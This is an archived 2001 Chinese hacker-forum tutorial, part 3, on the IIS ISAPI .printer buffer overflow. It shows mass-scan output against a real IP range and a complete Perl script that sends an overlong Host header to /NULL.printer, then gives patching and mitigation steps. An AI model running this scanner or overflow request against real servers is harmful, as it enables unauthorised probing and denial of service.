IIS ISAPI Printer远程溢出攻击--3(作者:badboy)

gugu 2001-08-07 03:44:36

加精

本帖版权归原作者，其它媒体或网站转载请与e龙西祠胡同[http://www.xici.net]或原作者联系，并注明出处。
作者: yagami 发表日期: 2001-05-24 13:20:34 返回《黑客也是侠》快速返回

IIS ISAPI Printer远程溢出攻击--3
—————————————————————————————————
badboy 坏男孩俱乐部
http://www.badclub.org/
badboyclub.163.net
badboyclub.go.163.com
这并不是什么权威教材，只适合菜鸟了解win9x、NT存在的不安全面，切莫
用此方法在国内做尝试，如果你偏要如此，那么由此引起的一切法律后果由
你自己负责。
本文只允许在网络任意转载，但须保留文章的完整性，如把本文作为经济目
的使用，或者未经本人许可进行印刷、光盘杂志、等出版性质的行为，本人
将保留侵权控告的权利。
本文内所谈到的程序具有一定的危害性，如果你安全技术能力有限，请勿测试。
—————————————————————————————————--
四、一些扫描.printer漏洞的程序测试
1、eyas编写的扫描程序cgicheck
eyas我一个很好的朋友，一个很有进取精神的小伙子，现在在国内某安全公司
工作，在微软的.printer漏洞公告出来后就写了一个专门扫描该漏洞的工具
scanprinter，由于时间仓促，那软件尽管可以扫描该漏洞，但在定制扫描线程
和超时延迟方面没有写好，使用起来不是那么如意。
本来想介绍他的scanprinter，恰好在我写到这部分内容时，他给我E来他的新
作品cgicheck，这也是个测试版的DOS命令工具，从文件名我们可以看到，他打
算把这软件写成类似twwwscan那样的cgi漏洞扫描工具。
现在让我们看看使用效果。
以下是运行在AMD850 128MB 64KISDN WIN98SE 下的扫描情况。
E:\>CGICHECK 203.212.4.1 203.212.4.255 100 4
[203.212.4.18 　] has .printer mapped.
[203.212.4.19 　] has .printer mapped.
[203.212.4.227 ] has .printer mapped.
******** 100% Wait 4 seconds to exit ********
[203.212.4.237 ] has .printer mapped.
[203.212.4.238 ] has .printer mapped.

All done.

Complete.Scan 254 targets use 15.8 seconds.Speed 16.1/s

从扫描结果来看这软件确实有很大的提高，建议EYAS在以后软件的升级中让软
件可以自定义所需要扫描的内容，毕竟在针对某网段的扫描，我们不需要把所
有的CGI漏洞都扫描(要知道有些漏洞已经很少看见了，加进去只耽误扫描的效
率)。

2、pl扫描程序
我们看以下的一个用perl编写的扫描程序
#!/usr/bin/perl
# Exploit By storm@stormdev.net
# Tested with sucess against Win2k IIS 5.0 + SP1
# Remote Buffer Overflow Test for Internet Printing Protocol
# This code was written after eEye brought this issue in BugTraq.
use Socket;
print "-- IPP - IIS 5.0 Vulnerability Test By Storm --\n\n";
if (not $ARGV[0]) {
print qq~
Usage: webexplt.pl <host>
~;
exit;}
$ip=$ARGV[0];
print "Sending Exploit Code to host: " . $ip . "\n\n";
my @results=sendexplt("GET /NULL.printer HTTP/1.0\n" . "Host:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n");
print "Results:\n";
if (not @results) {
print "The Machine tested has the IPP Vulnerability!";
}
print @results;
sub sendexplt {
　　　 my ($pstr)=@_;
$target= inet_aton($ip) || die("inet_aton problems");
　　 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
　　　　　　　 die("Socket problems\n");
　　　 if(connect(S,pack "SnA4x8",2,80,$target)){
　　　　　　　 select(S); 　　　　　　
$|=1;
　　　　　　　 print $pstr; 　　　　　
my @in=<S>;
　　　　 select(STDOUT);
　　　 close(S);
　　　　　　　 return @in;
　　　 } else { die("Can't connect...\n"); }
}

---------------------------------------------------------------
实际上这扫描程序是一个比较简单的pl扫描，命令格式webexplt.pl ip
只能针对某一IP地址进行检测，通过发送GET /NULL.printer HTTP/1.0\n
请求，然后传送一超长字符串给目标主机，去检测是否存在.printer漏洞。

3、其他的一些扫描软件例如www.netguard.com.cn、www.xfocus.org
发布的easyscan、x-scaner都专门做了针对printer漏洞的扫描，大家可以
试试。

5、漏洞的消除
最好的办法是安全微软针对这漏洞发的补丁：
补丁下载地址：
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321

在你无法获得补丁的情况下，我们也可以通过手动的方式设置你的服务器：
设置》控制面板》管理工具》INTERNET服务管理器》右键单击你的站点
如我的是badboy-f5gzewyd》属性》编辑WWW服务》主目录》配置》
应用程序配置》找到.printer》清除
但这样的操作你就丧失网络打印的功能。
呵呵，总比被人利用这漏洞入侵要好呀。

----------------------------------------------------------------
全文结束，本篇文章部分内容由翻译自网络上相关的英文公告或者文章，由于
本人水平有限，尚有不足之处，在编写的同时只考虑到初学者的认识能力，还
望众高手指正。谢谢。

　　流星的光芒虽短促,但天上还有什么星能比它更灿烂,辉煌?　
　　当流星出现的时候,就算是永恒不变的星座,也夺不去它的光彩.　
　　蝴蝶的生命是脆弱的甚至比鲜艳的花还脆弱.　
　　可是它永远是活在春天里.它美丽,它自由,它飞翔.　
　　它的生命虽短促却芬芳.　
　　流星消逝的时候,光明己在望.黑暗无论多长,光明迟早总会来的.　
　　
　　
　　　　　　　有空去我们的站Patching Heroes　　
　　　　　　　　　　 www.patching.net　
　　　计算机是一门只靠书本和自己上机就能掌握的技能　
黑客也是侠

补充日期: 2001-05-24 20:34:45

很精彩。。面面俱到。

　　流星的光芒虽短促,但天上还有什么星能比它更灿烂,辉煌?　
　　当流星出现的时候,就算是永恒不变的星座,也夺不去它的光彩.　
　　蝴蝶的生命是脆弱的甚至比鲜艳的花还脆弱.　
　　可是它永远是活在春天里.它美丽,它自由,它飞翔.　
　　它的生命虽短促却芬芳.　
　　流星消逝的时候,光明己在望.黑暗无论多长,光明迟早总会来的.　
　　
　　
　　　　　　　有空去我们的站Patching Heroes　　
　　　　　　　　　　 www.patching.net　
　　　计算机是一门只靠书本和自己上机就能掌握的技能　
黑客也是侠

--------------------------------------------------------------------------------

回应人: 浪哥发表日期: 2001-05-25 21:18:43

hehe
eyas is very good

　紧张的毕业设计中……　
天府之空了吹

--------------------------------------------------------------------------------

返回《黑客也是侠》快速返回

...全文